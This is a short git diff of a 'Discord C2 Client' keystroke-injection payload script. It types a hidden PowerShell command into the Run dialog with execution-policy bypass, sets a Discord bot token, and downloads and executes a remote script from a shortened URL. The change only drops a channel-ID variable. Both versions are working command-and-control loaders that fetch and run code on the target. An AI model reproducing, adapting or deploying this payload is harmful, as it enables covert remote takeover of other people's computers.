diff --git a/Discord-C2/Discord C2 Client.txt b/Discord-C2/Discord C2 Client.txt index 6c973da..6496317 100644 --- a/Discord-C2/Discord C2 Client.txt +++ b/Discord-C2/Discord C2 Client.txt @@ -18,6 +18,6 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex +STRING powershell -NoP -Ep Bypass -W H -C $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex ENTER